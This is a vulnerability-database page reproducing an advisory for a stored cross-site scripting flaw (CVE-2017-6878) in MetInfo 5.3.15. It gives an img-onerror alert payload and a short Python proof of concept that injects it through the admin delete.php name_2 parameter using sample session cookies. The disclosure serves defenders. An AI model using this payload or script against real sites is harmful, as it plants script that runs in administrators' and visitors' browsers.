Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

MetInfo 5.3.15 Cross Site Scripting

🗓️ 18 Mar 2017 00:00:00Reported by Arice.chenType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 55 Views

MetInfo 5.3.15 Stored Cross Site Scripting in delete.ph

Related
Code
ReporterTitlePublishedViews
Family
CNVD		MetInfo HTML Injection Vulnerability
22 Mar 201700:00
cnvd
CVE		CVE-2017-6878
27 Mar 201715:00
cve
Cvelist		CVE-2017-6878
27 Mar 201715:00
cvelist
EUVD		EUVD-2017-15932
7 Oct 202500:30
euvd
NVD		CVE-2017-6878
27 Mar 201715:59
nvd
OSV		CVE-2017-6878
27 Mar 201715:59
osv
Prion		Cross site scripting
27 Mar 201715:59
prion
seebug.org		MetInfo5.3.15 存储型 XSS 漏洞(CVE-2017-6878)
22 Mar 201700:00
seebug
`PSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPS  
PSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPS  
[CVE-2017-6878]:MetInfo5.3.15 Stored Cross Site Scripting  
Application: MetInfo  
Versions Affected: 5.3.15  
Vendor URL: http://www.metinfo.cn/  
Software Link:http://www.metinfo.cn/upload/file/MetInfo5.3.zip  
Bugs: Stored XSS  
Author:Arice.chen(DBAPPSecurity Ltd)  
Description:  
MetInfo was established in March 2009, is a enterprise CMS, more than 40 m enterprises in the use of MeInfo build their own enterprise website.  
  
  
Vulnerability detailsPSo  
To modify, add a message in problem position insert JavaScript test code <img src=x onerror=alert(1)>  
Then the background access to relevant pages, or other users access to the front desk page will make the attack code is executed.  
---------------------------------------------  
[email protected]  
DBAppSecurity Ltd  
www.dbappsecurity.com.cn  
  
  
POC:  
import requests  
url = "http://192.168.0.28/MetInfo5.3/admin/column/delete.php?anyid=25&lang=cn&ajaxmetinfo=1&no_order_2=1&name_2=1<img src=x onerror=alert(2)>&nav_2=1&index_num_2=0&action=editor&lang=cn&anyid=25&allid=2,"  
headers = {  
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",  
}  
cookies = dict(PHPSESSID="9o2pth5a43hpj23nflnc7lfi24",  
recordurl="",  
met_auth="dfc7PoNLWryZ6Bu2hOEqxsEzRwMf3Nc%2BYqOWCxrSuQ2SivQF%2Fwfo0OP4JEP%2F7QakKJaXa46h5BB3nqrtt58caQaJcQ",  
met_key="pnZh0Fw",  
langset="cn",  
upgraderemind="1",  
tablepage_json="0%7Cuser%2Cadmin_user%2Cdojson_user_list"  
)  
s = requests.get(url,cookies=cookies,headers=headers,timeout=10,verify=False)  
if s.status_code==200:  
print 'Success'  
  
  
Use this POC needs to obtain the cookie after login, because insert JavaScript place in the background.  
The problem find is delete.php?name_2=  
payload is :<img src=x onerror=alert(2)>  
  
  
If after the success of the insert JavaScript, to several places in the background and other users access to the front desk page to attack code execution  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Mar 2017 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.00291
metinfostored cross site scriptingvulnerabilitydelete.php
55